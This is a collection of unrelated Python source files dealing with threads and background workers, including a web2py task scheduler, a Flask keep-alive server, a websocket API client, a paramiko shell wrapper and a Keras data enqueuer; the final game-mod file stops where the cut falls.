(~ws.status.belongs(exclusion)) ).update(status=action) else: for group in group_names: workers = self.db((ws.group_names.contains(group)) & (~ws.status.belongs(exclusion)) )._select(ws.id, limitby=(0, limit)) self.db(ws.id.belongs(workers)).update(status=action) def disable(self, group_names=None, limit=None, worker_name=None): """Set DISABLED on the workers processing `group_names` tasks. A DISABLED worker will be kept alive but it won't be able to process any waiting tasks, essentially putting it to sleep. By default, all group_names of Scheduler's instantation are selected """ self.set_worker_status( group_names=group_names, action=DISABLED, exclude=[DISABLED, KILL, TERMINATE], limit=limit) def resume(self, group_names=None, limit=None, worker_name=None): """Wakes a worker up (it will be able to process queued tasks)""" self.set_worker_status( group_names=group_names, action=ACTIVE, exclude=[KILL, TERMINATE], limit=limit) def terminate(self, group_names=None, limit=None, worker_name=None): """Sets TERMINATE as worker status. The worker will wait for any currently running tasks to be executed and then it will exit gracefully """ self.set_worker_status( group_names=group_names, action=TERMINATE, exclude=[KILL], limit=limit) def kill(self, group_names=None, limit=None, worker_name=None): """Sets KILL as worker status. The worker will be killed even if it's processing a task.""" self.set_worker_status( group_names=group_names, action=KILL, limit=limit) def queue_task(self, function, pargs=[], pvars={}, **kwargs): """ Queue tasks. 
This takes care of handling the validation of all parameters Args: function: the function (anything callable with a __name__) pargs: "raw" args to be passed to the function. Automatically jsonified. pvars: "raw" kwargs to be passed to the function. Automatically jsonified kwargs: all the parameters available (basically, every `scheduler_task` column). If args and vars are here, they should be jsonified already, and they will override pargs and pvars Returns: a dict just as a normal validate_and_insert(), plus a uuid key holding the uuid of the queued task. If validation is not passed ( i.e. some parameters are invalid) both id and uuid will be None, and you'll get an "error" dict holding the errors found. """ if hasattr(function, '__name__'): function = function.__name__ targs = 'args' in kwargs and kwargs.pop('args') or dumps(pargs) tvars = 'vars' in kwargs and kwargs.pop('vars') or dumps(pvars) tuuid = 'uuid' in kwargs and kwargs.pop('uuid') or web2py_uuid() tname = 'task_name' in kwargs and kwargs.pop('task_name') or function immediate = 'immediate' in kwargs and kwargs.pop('immediate') or None cronline = kwargs.get('cronline') kwargs.update( function_name=function, task_name=tname, args=targs, vars=tvars, uuid=tuuid, ) if cronline: try: start_time = kwargs.get('start_time', self.now) next_run_time = CronParser(cronline, start_time).get_next() kwargs.update(start_time=start_time, next_run_time=next_run_time) except: pass if 'start_time' in kwargs and 'next_run_time' not in kwargs: kwargs.update(next_run_time=kwargs['start_time']) rtn = self.db.scheduler_task.validate_and_insert(**kwargs) if not rtn.errors: rtn.uuid = tuuid if immediate: self.db( (self.db.scheduler_worker.is_ticker == True) ).update(status=PICK) else: rtn.uuid = None return rtn def task_status(self, ref, output=False): """ Retrieves task status and optionally the result of the task Args: ref: can be - an integer : lookup will be done by scheduler_task.id - a string : lookup will be done by scheduler_task.uuid - a `Query` : lookup as you wish, e.g. :: db.scheduler_task.task_name == 'test1' output(bool): if `True`, fetch also the scheduler_run record Returns: a single Row object, for the last queued task. If output == True, returns also the last scheduler_run record. The scheduler_run record is fetched by a left join, so it can have all fields == None """ from pydal.objects import Query sr, st = self.db.scheduler_run, self.db.scheduler_task if isinstance(ref, (int, long)): q = st.id == ref elif isinstance(ref, str): q = st.uuid == ref elif isinstance(ref, Query): q = ref else: raise SyntaxError( "You can retrieve results only by id, uuid or Query") fields = [st.ALL] left = False orderby = ~st.id if output: fields = st.ALL, sr.ALL left = sr.on(sr.task_id == st.id) orderby = ~st.id | ~sr.id row = self.db(q).select( *fields, **dict(orderby=orderby, left=left, limitby=(0, 1)) ).first() if row and output: row.result = row.scheduler_run.run_result and \ loads(row.scheduler_run.run_result, object_hook=_decode_dict) or None return row def stop_task(self, ref): """Shortcut for task termination. If the task is RUNNING it will terminate it, meaning that status will be set as FAILED. 
If the task is QUEUED, its stop_time will be set as to "now", the enabled flag will be set to False, and the status to STOPPED Args: ref: can be - an integer : lookup will be done by scheduler_task.id - a string : lookup will be done by scheduler_task.uuid Returns: - 1 if task was stopped (meaning an update has been done) - None if task was not found, or if task was not RUNNING or QUEUED Note: Experimental """ st, sw = self.db.scheduler_task, self.db.scheduler_worker if isinstance(ref, (int, long)): q = st.id == ref elif isinstance(ref, str): q = st.uuid == ref else: raise SyntaxError( "You can retrieve results only by id or uuid") task = self.db(q).select(st.id, st.status, st.assigned_worker_name) task = task.first() rtn = None if not task: return rtn if task.status == 'RUNNING': q = sw.worker_name == task.assigned_worker_name rtn = self.db(q).update(status=STOP_TASK) elif task.status == 'QUEUED': rtn = self.db(q).update( stop_time=self.now(), enabled=False, status=STOPPED) return rtn def get_workers(self, only_ticker=False): """ Returns a dict holding `worker_name : {**columns}` representing all "registered" workers only_ticker returns only the workers running as a TICKER, if there are any """ db = self.db if only_ticker: workers = db(db.scheduler_worker.is_ticker == True).select() else: workers = db(db.scheduler_worker.id > 0).select() all_workers = {} for row in workers: all_workers[row.worker_name] = Storage( status=row.status, first_heartbeat=row.first_heartbeat, last_heartbeat=row.last_heartbeat, group_names=row.group_names, is_ticker=row.is_ticker, worker_stats=row.worker_stats ) return all_workers def main(): """ allows to run worker without python web2py.py .... by simply:: python gluon/scheduler.py """ parser = optparse.OptionParser() parser.add_option( "-w", "--worker_name", dest="worker_name", default=None, help="start a worker with name") parser.add_option( "-b", "--heartbeat", dest="heartbeat", default=10, type='int', help="heartbeat time in seconds (default 10)") parser.add_option( "-L", "--logger_level", dest="logger_level", default=30, type='int', help="set debug output level (0-100, 0 means all, 100 means none;default is 30)") parser.add_option("-E", "--empty-runs", dest="max_empty_runs", type='int', default=0, help="max loops with no grabbed tasks permitted (0 for never check)") parser.add_option( "-g", "--group_names", dest="group_names", default='main', help="comma separated list of groups to be picked by the worker") parser.add_option( "-f", "--db_folder", dest="db_folder", default='/Users/mdipierro/web2py/applications/scheduler/databases', help="location of the dal database folder") parser.add_option( "-u", "--db_uri", dest="db_uri", default='sqlite://storage.sqlite', help="database URI string (web2py DAL syntax)") parser.add_option( "-t", "--tasks", dest="tasks", default=None, help="file containing task files, must define" + "tasks = {'task_name':(lambda: 'output')} or similar set of tasks") parser.add_option( "-U", "--utc-time", dest="utc_time", default=False, help="work with UTC timestamps" ) (options, args) = parser.parse_args() if not options.tasks or not options.db_uri: print(USAGE) if options.tasks: path, filename = os.path.split(options.tasks) if filename.endswith('.py'): filename = filename[:-3] sys.path.append(path) print('importing tasks...') tasks = __import__(filename, globals(), locals(), [], -1).tasks print('tasks found: ' + ', '.join(tasks.keys())) else: tasks = {} group_names = [x.strip() for x in options.group_names.split(',')] 
logging.getLogger().setLevel(options.logger_level) print('groups for this worker: ' + ', '.join(group_names)) print('connecting to database in folder: ' + options.db_folder or './') print('using URI: ' + options.db_uri) db = DAL(options.db_uri, folder=options.db_folder) print('instantiating scheduler...') scheduler = Scheduler(db=db, worker_name=options.worker_name, tasks=tasks, migrate=True, group_names=group_names, heartbeat=options.heartbeat, max_empty_runs=options.max_empty_runs, utc_time=options.utc_time) signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1)) print('starting main worker loop...') scheduler.loop() if __name__ == '__main__': main()
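For orientation, here is a minimal, hedged sketch of how this Scheduler is normally wired up inside a web2py application's model file. `db` is assumed to be the application's existing DAL connection and `task_add` is a made-up task; the worker process is then typically started separately (for example with `python web2py.py -K appname`, or by running this module directly as `main()` does above).

# models/scheduler.py (hypothetical) -- register tasks and queue one
from gluon.scheduler import Scheduler

def task_add(a, b):
    return a + b

scheduler = Scheduler(db, tasks=dict(task_add=task_add),
                      group_names=['main'], heartbeat=3)

# queue a repeating task; extra kwargs map onto scheduler_task columns
r = scheduler.queue_task(task_add, pargs=[1, 2],
                         period=60,        # seconds between runs
                         repeats=0,        # 0 = repeat forever
                         timeout=30,
                         immediate=True)   # flag the ticker so it assigns ASAP
print(r.uuid)

# later: poll the task (and its latest scheduler_run row)
row = scheduler.task_status(r.uuid, output=True)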
keep_alive.py
from flask import Flask, render_template, redirect
from threading import Thread
import random

app = Flask('')


@app.route('/')
def lol():
    # roughly 1 request in 11 gets redirected; the rest get the normal page
    if random.randint(0, 10) == 0:
        return redirect('https://www.youtube.com/watch?v=dQw4w9WgXcQ')
    else:
        return render_template('home.html')


def run():
    # listen on all interfaces, on a random port between 2000 and 9000
    app.run(
        host='0.0.0.0',
        port=random.randint(2000, 9000)
    )


def keep_alive():
    '''Creates and starts a new thread that runs the function run.'''
    t = Thread(target=run)
    t.start()
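A hedged sketch of the usual way this module is consumed: the caller starts the tiny web server in the background so an external uptime monitor can keep pinging the process, then runs its real workload. The bot call and TOKEN below are placeholders, not part of this file.

# main.py (hypothetical)
from keep_alive import keep_alive

keep_alive()            # Flask now serves in a background thread
# bot.run(TOKEN)        # the long-running main job (e.g. a Discord bot) goes here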
async_service.py
# -*- coding: utf-8 -*- """ Created by susy at 2020/3/16 """ from controller.base_service import BaseService from utils.caches import cache_service, get_from_cache from utils import singleton, get_now_ts, log as logger from typing import Callable, Tuple from threading import Thread from dao.models import try_release_conn THREAD_LIMIT_PARAMS = { "max": 100, "actived": 0 } @singleton class AsyncService(BaseService): def __init__(self): super().__init__() def __build_thread(self, __run: Callable): if THREAD_LIMIT_PARAMS['actived'] < THREAD_LIMIT_PARAMS['max']: THREAD_LIMIT_PARAMS['actived'] = THREAD_LIMIT_PARAMS['actived'] + 1 return Thread(target=__run) def release_thread(self): if THREAD_LIMIT_PARAMS['actived'] > 0: THREAD_LIMIT_PARAMS['actived'] = THREAD_LIMIT_PARAMS['actived'] - 1 def async_checkout_client_item(self, prefix, suffix, action: Callable[..., dict]=None, final_call: Callable=None): ctx = self key = "async:%s:%s" % (prefix, suffix) rs_key = "async:%s:rs:%s:" % (prefix, suffix) def __run(): logger.info("thread to run in.") # cache_service.rm(rs_key) rs = {} if action: try: rs = action(key, rs_key) except Exception: logger.error("exe action failed.", exc_info=True) pass self.__thread = None cache_service.rm(key) rs['end'] = 1 # cache_service.put(rs_key, rs) self.update_state(prefix, suffix, rs) if final_call: try: final_call() except Exception: pass try_release_conn() ctx.release_thread() pass __thread = self.__build_thread(__run) if __thread: not_exists = cache_service.put_on_not_exists(key, get_now_ts()) if not_exists: __thread.start() else: return {"state": "block"} else: return {"state": "block"} return {"state": "run"} def init_state(self, prefix, suffix, val): rs_key = "async:%s:rs:%s:" % (prefix, suffix) # print('async update state:', val) cache_service.replace(rs_key, val) def update_state(self, prefix, suffix, val): rs_key = "async:%s:rs:%s:" % (prefix, suffix) # print('async update state:', val) cache_service.put(rs_key, val) def checkout_key_state(self, prefix, suffix): rs_key = "async:%s:rs:%s:" % (prefix, suffix) val = cache_service.get(rs_key) # if 'end' in val and val['end'] == 1: # cache_service.rm(rs_key) return val async_service = AsyncService()
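To make the flow concrete, here is a hedged usage sketch. The "sync"/"user42" prefix and suffix and the `do_sync` callback are made up; per the signature above, `action` receives the lock key and the result key and should return a dict, and progress can later be polled with `checkout_key_state`.

def do_sync(key, rs_key):
    # long-running work goes here
    return {"synced": 10}

rs = async_service.async_checkout_client_item("sync", "user42", action=do_sync)
# rs == {"state": "run"} if a worker thread was started, {"state": "block"} otherwise
progress = async_service.checkout_key_state("sync", "user42")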
RemoteApiClient.py
from .PromiseStore import DeferredPromise, PromiseStore
import websocket
from threading import Thread
import json


class RemoteApiClient:
    """Provides access to Remote APIs"""

    def __init__(self, endpointUri):
        self.Promises = PromiseStore()
        self.Connected = DeferredPromise()
        self.ws = websocket.WebSocketApp(endpointUri,
                                         on_message=self._on_message,
                                         on_error=self._on_error,
                                         on_open=self._on_open,
                                         on_close=self._on_close)

    def connect(self):
        """Run the websocket client in a background thread."""
        def run():
            self.ws.run_forever()
        self.worker = Thread(target=run)
        self.worker.start()

    def close(self):
        self.ws.close()

    async def call(self, apiName: str, methodName: str, args=[]):
        # wait until the socket is open, then send a "call" frame and await its promise
        await self.Connected.promise
        promiseId = self.Promises.create()
        self.ws.send(json.dumps([
            apiName,
            "call",
            {
                "promiseId": promiseId,
                "methodName": methodName,
                "args": args,
            }
        ]))
        return await self.Promises.get(promiseId)

    def _on_open(self, ws):
        self.Connected.set_result(None)

    def _on_message(self, ws, message):
        msg = json.loads(message)
        if msg[1] == "set-promise":
            self._set_promise(msg[2])

    def _set_promise(self, value):
        if value["success"]:
            self.Promises.complete(value["promiseId"], value["value"])
        else:
            self.Promises.fail(value["promiseId"], value["error"])

    def _on_error(self, ws, error):
        return

    def _on_close(self, ws, close_status_code, close_msg):
        # reset the "connected" gate so callers wait for a reconnect
        self.Connected = DeferredPromise()
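A hedged asyncio usage sketch, assuming the DeferredPromise/PromiseStore helpers are awaitable from the running event loop; the endpoint URL and the "math"/"add" names are placeholders.

import asyncio

async def demo():
    client = RemoteApiClient("ws://localhost:8000/api")
    client.connect()                          # websocket runs in a worker thread
    result = await client.call("math", "add", [1, 2])
    print(result)
    client.close()

asyncio.run(demo())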
paramikospawn.py
# pylint: disable=signature-differs """Provides an interface like pexpect.spawn interface using paramiko The implementation is based on 'pexpect.popen_spawn.PopenSpawn'. """ import threading import socket import logging # CAUTION: spawnbase is not mentioned in __all__ so it is supposed to used # internally only, from pexpect.spawnbase import SpawnBase, PY3 from pexpect import EOF, TIMEOUT __copyright__ = 'Copyright (C) 2019, Nokia' logger = logging.getLogger(__name__) try: from queue import Queue, Empty # Python 3 except ImportError: from Queue import Queue, Empty # Python 2 class ParamikoSpawn(SpawnBase): """ ParamikoSpawn uses the same mechanism than *PopenSpawn* for reading and writing from/to 'socket' but instead of *subprocess.Popen* it uses *paramiko.channel.Channel* which has to be given as an argument *chan*. """ if PY3: crlf = '\n'.encode('ascii') else: crlf = '\n' def __init__(self, chan, timeout=30, maxread=40000, searchwindowsize=None, logfile=None, encoding=None, codec_errors='strict'): super(ParamikoSpawn, self).__init__( timeout=timeout, maxread=maxread, searchwindowsize=searchwindowsize, logfile=logfile, encoding=encoding, codec_errors=codec_errors) self.chan = chan self.closed = False self._buf = self.string_type() self._read_reached_eof = False self._chunk_size = 32000 self._read_queue = Queue() self._read_thread = threading.Thread(target=self._read_incoming) self._read_thread.setDaemon(True) self._read_thread.start() def read_nonblocking(self, size, timeout): if self._read_reached_eof: self.flag_eof = True raise EOF('End Of File (EOF).') if timeout == -1: timeout = self.timeout elif timeout is None: timeout = 1e6 return self._read_queue_and_buf(timeout, size) if size > 0 else '' def _read_queue_and_buf(self, timeout, size): buf = self._read_with_or_without_timeout(timeout=timeout, size=size, buf=self._buf) r, self._buf = buf[:size], buf[size:] if self._read_reached_eof and not r: self.flag_eof = True raise EOF('End-of-file from read_nonblocking') self._log(r, '_read_from_queue') return r def _read_with_or_without_timeout(self, timeout, size, buf): if not buf: try: buf = self._read_from_queue(timeout=timeout, size=size, buf=buf) except Empty: if not self._buf: raise TIMEOUT('read_nonblocking: timeout exceeded') else: buf = self._read_from_queue_until_end_or_size(buf, size) return buf def _read_from_queue(self, timeout, size, buf): incoming = self._read_queue.get(timeout=timeout) if incoming is None: self._read_reached_eof = True return buf buf += self._decoder.decode(incoming, final=False) return self._read_from_queue_until_end_or_size(buf, size) def _read_from_queue_until_end_or_size(self, buf, size): while len(buf) < size: try: incoming = self._read_queue.get_nowait() if incoming is None: self._read_reached_eof = True break else: buf += self._decoder.decode(incoming, final=False) except Empty: break return buf def _read_incoming(self): """Run in a thread to move output from the chan to a queue.""" while True: buf = b'' try: buf = self.chan.recv(32768) except socket.timeout as e: self._log(e, 'read_incoming') if not buf: # This indicates we have reached EOF self._read_queue.put(None) return self._read_queue.put(buf) def write(self, s): '''This is similar to send() except that there is no return value. ''' self.send(s) def writelines(self, sequence): '''This calls write() for each element in the sequence. The sequence can be any iterable object producing strings, typically a list of strings. This does not add line separators. There is no return value. 
''' for s in sequence: self.send(s) def send(self, s): '''Send data to the Paramiko channel. Returns the number of bytes written. ''' s = self._coerce_send_string(s) self._log(s, 'send') b = self._encoder.encode(s, final=False) return self._send_in_chunks(b) def _send_in_chunks(self, b): sbytes = 0 for i in range(0, len(b), self._chunk_size): sbytes += self.chan.send(b[i:i + self._chunk_size]) return sbytes def sendline(self, s=''): '''Wraps send(), sending string ``s`` to child process, with os.linesep automatically appended. Returns number of bytes written. ''' n = self.send(s) return n + self.send(self.linesep) def wait(self): '''Not used by interactivesessions. ''' raise NotImplementedError() def kill(self, sig): '''This is used by interactivesessions but rarely. Not implementing now. ''' raise NotImplementedError() def sendeof(self): '''Closes channel.''' self.chan.close() def close(self, force=False): # pylint: disable=unused-argument logger.debug('closing ParamikoSpawn %s', self) self.sendeof() self._read_thread.join(10)
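A hedged sketch of driving an interactive SSH shell with this class: open a paramiko channel with `invoke_shell()` and hand it to ParamikoSpawn, which then supports the usual pexpect-style `sendline`/`expect` calls inherited from SpawnBase. Host and credentials are placeholders.

import paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('example.com', username='user', password='secret')

chan = ssh.invoke_shell(width=200)      # paramiko.channel.Channel
spawn = ParamikoSpawn(chan, timeout=10, encoding='utf-8')
spawn.sendline('echo hello')
spawn.expect('hello')                   # expect() comes from pexpect's SpawnBase
spawn.close()
ssh.close()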
__init__.py
'''
Documentation, License etc.

@package PythonHostLib
'''
import ConfigParser
import json
import atexit
import time
import threading
import signal
import sys
import os

from threading import Thread

from VibratorManager import VibratorManager
from VibratorAdapter import VibratorAdapter
import GPIOController

config = ConfigParser.ConfigParser()
vibratorManager = VibratorManager()
update_intervall = 1
sequence_time = 120
bEnd = False
tThread = None
lLock = threading.Lock()

from flask import Flask, request
from flask import send_from_directory
app = Flask(__name__, static_url_path='/')
app._static_folder = os.path.dirname(os.path.realpath(__file__))
app.debug = False


@app.route("/points/<int:value>/")
def setPoints(value):
    global lLock
    lLock.acquire()
    vibratorManager.set_points(value)
    lLock.release()
    return "1"


@app.route("/points/")
def getPoints():
    global lLock
    lLock.acquire()
    points = vibratorManager.get_points()
    lLock.release()
    return str(points)


@app.route("/config/", methods=['GET'])
def getConfig():
    global config
    lLock.acquire()
    data = config.get("Vibrators", "data")
    lLock.release()  # release before returning so later requests do not deadlock
    return data


@app.route("/")
def getRoot():
    return app.send_static_file('frontend/index.html')


@app.route("/<path:path>")
def getFile(path):
    root_dir = os.path.dirname(os.getcwd())
    return send_from_directory('frontend', path)


def readConfigFromFile():
    global config
    config.read("playvibe_config.ini")
    if not config.has_section("Vibrators"):
        print("No vibrators were found in configuration!")
        print("A default vibrator will be created on pin 18.")
        config.add_section("Vibrators")
        config.set("Vibrators", "data", json.dumps([
            {'name': 'Default Vibrator', 'pin': 18, 'pwm': True, 'modes': [{'mode': 'ContinuousVibrations', 'min': 0, 'max': 100}]},
        ], indent=4, sort_keys=True))
    vibrators = config.get("Vibrators", "data")
    vibrators = json.loads(vibrators)
    global vibratorManager
    vibratorManager.clear()
    # Process available vibrators
    for vibe in vibrators:
        vibrator = VibratorAdapter(vibe)
        vibratorManager.add_vibe(vibrator)


def setConfig(configContent):
    global config
    config.set("Vibrators", "data", value=configContent)
    with open('playvibe_config.ini', 'w') as config_file:
        config.write(config_file)
    readConfigFromFile()


@app.route("/config/", methods=['POST'])
def setConfigOverHTTP():
    configData = request.form['json']
    setConfig(str(configData))
    return "1"  # Flask views must return a response


def start():
    print("Starting main logic.")
    lLock.acquire()
    # Parse the configuration
    print("Read config.")
    readConfigFromFile()
    lLock.release()
    try:
        print("Start the flask server")
        app.run(host='0.0.0.0')
    finally:
        end()


currentTime = 0


def periodicUpdate():
    global vibratorManager
    global currentTime
    lLock.acquire()
    vibratorManager.update_vibes(currentTime, sequence_time)
    currentTime += update_intervall
    if currentTime >= sequence_time:
        currentTime = 0
    lLock.release()


def periodicUpdateThread():
    print("Update worker has started!")
    while bEnd == False:
        periodicUpdate()
        time.sleep(update_intervall)
    print("Update worker has ended!")


def end():
    global config
    global bEnd
    global tThread
    bEnd = True
    print("Ending the program, write the configuration to a file")
    with open('playvibe_config.ini', 'w') as config_file:
        config.write(config_file)
    GPIOController.destroy()


if __name__ == "__main__":
    GPIOController.init()
    tThread = Thread(target=periodicUpdateThread)
    tThread.start()
    start()
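A hedged sketch of exercising the HTTP API defined above from another machine, using the third-party `requests` package. The hostname is purely illustrative and assumes Flask's default port 5000; the POST payload mirrors the default entry created in readConfigFromFile.

import requests

base = "http://raspberrypi.local:5000"           # hypothetical address of the host
requests.get(base + "/points/50/")               # set points to 50
print(requests.get(base + "/points/").text)      # read the current points back
print(requests.get(base + "/config/").text)      # vibrator configuration as JSON

new_cfg = ('[{"name": "Default Vibrator", "pin": 18, "pwm": true, '
           '"modes": [{"mode": "ContinuousVibrations", "min": 0, "max": 100}]}]')
requests.post(base + "/config/", data={"json": new_cfg})   # replace the configuration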
svr.py
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available. Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved. BK-BASE 蓝鲸基础平台 is licensed under the MIT License. License for BK-BASE 蓝鲸基础平台: -------------------------------------------------------------------- Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from __future__ import absolute_import, unicode_literals import logging import os import threading import time from abc import ABCMeta from multiprocessing import cpu_count from threading import BoundedSemaphore from weakref import WeakValueDictionary from dm_engine.base.common import get_ip from dm_engine.base.component import BaseComponentService from dm_engine.config import settings from dm_engine.utils.log import configure_logging logger = logging.getLogger(__name__) class SharedNamespace(object): """ Shared namespace for communication for HOSTSVR and ComponentSVR """ def __init__(self): self._sem = BoundedSemaphore(1) self._namespace = {} def set(self, key, value): self._namespace[key] = value def get(self, key): return self._namespace[key] def atomic(self): return Atomic(self._sem) class Atomic(object): def __init__(self, sem): self._sem = sem def __enter__(self): self._sem.acquire() def __exit__(self, exc_type, exc_val, exc_tb): self._sem.release() class BaseHostSvr(object): """ Host service processing standard works, such as long-time running, status reportor, etc. Another core work is keeping component services running normally. """ __metaclass__ = ABCMeta NAME = "default" def __init__(self): # SVR shared namespace, create & update operation must use SharedNamespace method. 
self.namespace = SharedNamespace() # [Declaration From Subclass] Logger Configuration self.log_config = None # [Declaration From Subclass] Component Services self.services = [] self.services_threads_group = WeakValueDictionary() # Machine infomation self.svr_id = "" self.svr_ip = "" self.svr_cpu_count = 1 self.svr_pid = "" # Running event represent that the service is avtive self.running = threading.Event() def setup(self): configure_logging( log_level=settings.LOG_LEVEL, log_module=self.NAME, log_dir=settings.LOG_DIR, report_sentry=settings.REPORT_SENTRY, sentry_DSN=settings.SENTRY_DSN, ) def start(self): """ Entry function """ try: self.setup() self.running.set() # Gain server ip & process id, and generate svr_id (service identifier) self.svr_ip = get_ip() self.svr_pid = os.getpid() self.svr_cpu_count = cpu_count() self.svr_id = "{}_{}".format(self.svr_ip, self.svr_pid) self.setup_services() logger.info("Start main circulation of host service.") while self.running.is_set(): logger.debug("Heartbeat from host servie...") self.handle() self.guard_services() time.sleep(1) except KeyboardInterrupt: self.stop() def handle(self): """ Main execution code in the circulation of host service. This method can be overrided according to different scene. """ pass def setup_services(self): """ Setup component-services, default []. Subclass can add the compnents services to self.services attribute by overriding this method. """ self.services = [] def stop(self): """ Stop process Clear running event and waiting for service stop gracefully. """ self.running.clear() for thread_obj in self.services_threads_group.values(): thread_obj.join() def guard_services(self): """ Guard component services registed in the host service. Check and restart the component-services every 1s. Note component service must be the subclass of BaseComponentService. """ for service_obj in self.services: _service_name = service_obj.__class__ if (_service_name not in self.services_threads_group) or not ( self.services_threads_group[_service_name].is_alive() ): if not isinstance(service_obj, BaseComponentService): logger.error("Invalid BaseComponentService.") continue _thread_obj = threading.Thread(target=lambda _s: _s.start(), args=(service_obj,)) self.services_threads_group[_service_name] = _thread_obj logger.info("Start to run service {}, the interval is {} sec".format(service_obj, service_obj.interval)) _thread_obj.start()
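A hedged sketch of a concrete host service built on BaseHostSvr: the subclass only needs to name itself and register its component services in `setup_services()`. `MyComponent` stands in for a real BaseComponentService subclass and is not defined here.

class MyHostSvr(BaseHostSvr):
    NAME = "my_host"

    def setup_services(self):
        # each registered service is (re)started by guard_services() if its thread dies
        self.services = [MyComponent()]


if __name__ == "__main__":
    MyHostSvr().start()   # blocks in the 1-second heartbeat loop until Ctrl-C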
data_util.py
''' this file is modified from keras implemention of data process multi-threading, see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py ''' #!/usr/bin/env python3 # -*- coding:utf-8 -*- import time import numpy as np import threading import multiprocessing try: import queue except ImportError: import Queue as queue class GeneratorEnqueuer(): """Builds a queue out of a data generator. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. # Arguments generator: a generator function which endlessly yields data use_multiprocessing: use multiprocessing if True, otherwise threading wait_time: time to sleep in-between calls to `put()` random_seed: Initial seed for workers, will be incremented by one for each workers. """ def __init__(self, generator, use_multiprocessing=False, wait_time=0.05, random_seed=None): self.wait_time = wait_time self._generator = generator self._use_multiprocessing = use_multiprocessing self._threads = [] self._stop_event = None self.queue = None self.random_seed = random_seed def start(self, workers=1, max_queue_size=10): """Kicks off threads which add data from the generator into the queue. # Arguments workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`) """ def data_generator_task(): while not self._stop_event.is_set(): try: if self._use_multiprocessing or self.queue.qsize() < max_queue_size: generator_output = next(self._generator) self.queue.put(generator_output) else: time.sleep(self.wait_time) except Exception: self._stop_event.set() raise try: if self._use_multiprocessing: self.queue = multiprocessing.Queue(maxsize=max_queue_size) self._stop_event = multiprocessing.Event() else: self.queue = queue.Queue() self._stop_event = threading.Event() for _ in range(workers): if self._use_multiprocessing: # Reset random seed else all children processes # share the same seed np.random.seed(self.random_seed) thread = multiprocessing.Process(target=data_generator_task) thread.daemon = True if self.random_seed is not None: self.random_seed += 1 else: thread = threading.Thread(target=data_generator_task) self._threads.append(thread) thread.start() except: self.stop() raise def is_running(self): return self._stop_event is not None and not self._stop_event.is_set() def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. # Arguments timeout: maximum time to wait on `thread.join()`. """ if self.is_running(): self._stop_event.set() for thread in self._threads: if thread.is_alive(): if self._use_multiprocessing: thread.terminate() else: thread.join(timeout) if self._use_multiprocessing: if self.queue is not None: self.queue.close() self._threads = [] self._stop_event = None self.queue = None def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. # Returns A generator """ while self.is_running(): if not self.queue.empty(): inputs = self.queue.get() if inputs is not None: yield inputs else: time.sleep(self.wait_time)
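A hedged usage sketch in the spirit of the docstring above: wrap a (typically infinite) batch generator so worker threads keep the queue filled, and pull batches out through `get()`. `batch_generator()` is a placeholder for the project's real data generator.

enqueuer = GeneratorEnqueuer(batch_generator(), use_multiprocessing=False)
enqueuer.start(workers=4, max_queue_size=16)
try:
    batches = enqueuer.get()          # generator that yields items from the queue
    for _ in range(100):
        data = next(batches)          # blocks (polling) until a batch is ready
        # ... feed `data` to the training step ...
finally:
    enqueuer.stop()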
mod_creditCalc.py
# -*- coding: utf-8 -*- import codecs as p__codecs import collections as p__collections import json as p__json import os as p__os import threading as p__threading from Queue import Queue as p__Queue from functools import partial as p__partial # noinspection PyUnresolvedReferences from gui.mods.mod_mods_gui import COMPONENT_ALIGN as p__COMPONENT_ALIGN, COMPONENT_EVENT as p__COMPONENT_EVENT, COMPONENT_TYPE as p__COMPONENT_TYPE, g_gui as p__g_gui, g_guiFlash as p__g_flash import BattleReplay as p__BattleReplay import BigWorld as p__BigWorld import Event import Keys as p__Keys import ResMgr as p__ResMgr from Avatar import PlayerAvatar as p__PlayerAvatar from BattleFeedbackCommon import BATTLE_EVENT_TYPE as p__BATTLE_EVENT_TYPE from CurrentVehicle import g_currentVehicle as p__g_currentVehicle from PlayerEvents import g_playerEvents as p__g_playerEvents from constants import ARENA_BONUS_TYPE as p__ARENA_BONUS_TYPE from frameworks.wulf import WindowLayer as ViewTypes from gui import InputHandler as p__InputHandler from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView as p__LobbyView from gui.Scaleform.daapi.view.meta.CrewMeta import CrewMeta as p__CrewMeta from gui.Scaleform.framework import ScopeTemplates, ViewSettings, g_entitiesFactories from gui.Scaleform.framework.entities.View import View from gui.Scaleform.framework.managers.loaders import SFViewLoadParams from gui.Scaleform.genConsts.HANGAR_ALIASES import HANGAR_ALIASES from gui.app_loader.settings import APP_NAME_SPACE from gui.battle_control.arena_info import vos_collections as p__vos_collections from gui.battle_control.battle_constants import VEHICLE_DEVICE_IN_COMPLEX_ITEM, VEHICLE_VIEW_STATE from gui.battle_control.controllers import feedback_events as p__feedback_events from gui.shared import EVENT_BUS_SCOPE, events, g_eventBus from gui.shared.formatters import icons from gui.shared.gui_items import Vehicle from gui.shared.personality import ServicesLocator, ServicesLocator as p__ServicesLocator from helpers import getLanguageCode as p__getLanguageCode from messenger.formatters.service_channel import BattleResultsFormatter as p__BattleResultsFormatter try: # noinspection PyUnresolvedReferences from gui import oldskool # noinspection PyUnresolvedReferences oldskoolCore = 